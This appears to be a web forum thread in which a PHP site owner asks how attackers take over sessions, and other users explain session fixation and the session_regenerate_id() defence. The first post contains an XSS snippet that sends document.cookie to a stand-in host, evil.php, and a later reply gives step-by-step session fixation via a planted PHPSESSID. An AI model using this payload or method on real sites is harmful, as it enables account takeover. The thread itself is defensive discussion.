I'm not quite sure how this is done, does anyone have experiance in this I know how you can use xss to send session info for a cookie cross site, for example: javascript: void(document.getElementById('theIdOfAnElement').innerHTML='<a onmouseover ="alert(document.cookie);" >mouseOverToShowCookie</a> <a href="javascript:window.location=www.example.com/evil.php?c=%22+document.cookie"> dOnT CLiCk ThiS</a>'); HTML: .. and then capture that cookie on the other site, and re-use (you'll first need to find a way to get the script in to the site, but you can test the method above with javascript injection) But I can't find any information how to hi-jack the php session cross site I've seen people attempting this on one of my sites. They came into my site trying to attack it by having pre-loaded session information set (and I log any strange behaviour like this, and I prevent the attack with dynamic session uuids that are set all over the place) I'm not sure how they are attempting the attack, since if you go outside of your domain, you can't do a session dump, since starting a new session on a different domain sets a new session Id (and hence none of your session variables are set) eg: So I'm wondering how people are trying to attack one of my sites with pre-defined session data? If I go cross domain, and try to dump all of my session variables: <?php var_dump($_SESSION); ?> PHP: Then, as expeceted, none are set (I would be worried if they were) So if you're an attacker, how do you go into a site with session variables already set?
They can't set the contents of $_SESSION - if that's happening, you have a hole somewhere. What they can do is force the use of a particular session, unless you session_regenerate_id() upon login. Attackers may try to coax an authorised user to use a known session ID so they can assume control of that session once the user logs in.
Yes, that's what I thought.. Everything I've read suggests you can't set the session variables for a page cross site. I've used system penetration tools such as Paros to capture and resend _GET and _POST, but I was worried there were other tools you could use to set session, and that I didn't know about them. The session variables are set server side right? So it wouldn't be theoretical possible to create a tool that could set these, would it? (unless the tool sat on a shared host... but I'm not looking in that direction for now) when you say session ID coaxing, are you talking about php session id, or other session IDs (for example within cookies as shown in my example)? If php session ids, how would you get this information without using sever side script? I can't see how a used could get this information. However, if they did get the php session somehow (???) then I could see how cross site session theft was possible (since you could set the session ID externally, start a session then dump all the session variables for that session ID) So, how could you get a user / system to give up the session ID?
The way PHP's session handler works, if you show up with a session ID it doesn't know about, it just starts a new session with that ID. The session ID can be provided as a cookie, or as a sid= argument in the query string if your PHP installation is configured to allow that. So, say I could use XSS to get a visitor to your site to create a new cookie in your domain, PHPSESSID=012345. Then I know the visitor is going to use that session ID when they go to your site. I wait until they go to your site and log in. Then, from my secret lair in the mountains, I also go to the site with PHPSESSID=012345. Presto, I am pre-authenticated as that user and can do/see anything they can.
ahh, the cookie session ID is the same as the PHP session ID, thats a bad idea! So all a hacker would have to do is send the users cookie to a get /post externally, and redirect the user to the page, set the php session id to the same as the one in the cookie, and then you call also get a complete php session dump (saving both the cookie and any other php session information that might be usefull... hmmm)
Well, there's not a way for the client to get the contents of $_SESSION unless you have programmed one in your application. All they can do is take over the session.
okay, so a session dump cross site shouldnt be possible. So really we're only talking about cookie theft like in my first example